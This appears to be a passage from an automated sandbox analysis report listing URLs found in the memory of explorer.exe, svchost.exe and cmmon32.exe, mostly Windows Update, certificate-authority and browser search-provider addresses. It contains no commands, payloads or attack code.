Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: svchost.exe, 0000000C.00000002.7727688812.0000022382600000.00000004.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2014/10/imjpzp_7735dba7ac13b0023
Source: svchost.exe, 0000000C.00000000.7246664291.0000022386F90000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/01/mpsigstub_a92fa1376c528b
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/06/updateplatform_b64be2e15
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/am_base_acd8007dbe3781fd
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/am_base_patch1_9318b0429
Source: svchost.exe, 0000000C.00000002.7802758537.0000022387E14000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/am_delta_1b45d79b6f282b2
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/am_delta_24b68721eaa8685
Source: svchost.exe, 0000000C.00000002.7802758537.0000022387E14000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/am_delta_2600c1a3b00c4fd
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/am_engine_53e243622a8b00
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/am_engine_patch_1.1.1490
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/defu/2018/07/mpsigstub_f803292685aff7
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103729-x6
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/uprl/2018/04/windows-kb890830-x64-v5.
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/uprl/2018/05/windows-kb890830-x64-v5.
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/uprl/2018/06/windows-kb890830-x64-v5.
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/c/msdownload/update/software/uprl/2018/07/windows-kb890830-x64-v5.
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2015/09/imjpnw_1b6f125e7c114cbd1
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2015/09/imjpst_edf0c36b1f1ddd3d3
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_2ab5d141b47cf9e
Source: svchost.exe, 0000000C.00000000.7246664291.0000022386F90000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_34bdba467ce02c0
Source: svchost.exe, 0000000C.00000002.7802758537.0000022387E14000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_76e885a60e46f95
Source: svchost.exe, 0000000C.00000002.7802758537.0000022387E14000.00000002.sdmp, svchost.exe, 0000000C.00000002.7794725698.0000022387C04000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_7d8c7a293002823
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.103
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.104
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.105
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.106
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.107
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.108
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.109
Source: svchost.exe, 0000000C.00000000.7273907339.0000022387D80000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.110
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.800
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.804
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.811
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.824
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.849
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.859
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.864
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/defu/2018/07/am_delta_patch_1.271.870
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/dflt/2018/07/am_base_patch1_d3a98250a
Source: svchost.exe, 0000000C.00000000.7246664291.0000022386F90000.00000002.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/dflt/2018/07/am_engine_6f532ea78f37c9
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/06/windows10.0-kb4287903-x6
Source: svchost.exe, 0000000C.00000002.7786447459.0000022387A00000.00000008.sdmp | String found in binary or memory: http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/06/windows10.0-kb4338832-x6
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmp | String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: svchost.exe, 0000000C.00000002.7727688812.0000022382600000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 0000000C.00000000.7217036538.0000022382376000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: svchost.exe, 0000000C.00000000.7211611715.0000022381481000.00000004.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: svchost.exe, 0000000C.00000000.7217363445.0000022382400000.00000004.sdmpString found in binary or memory: http://passport.net/tb
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://price.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6546938513.0000000006930000.00000002.sdmpString found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://udn.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000005.00000000.6546938513.0000000006930000.00000002.sdmpString found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000005.00000000.6520278973.0000000002B50000.00000002.sdmpString found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ask.com/
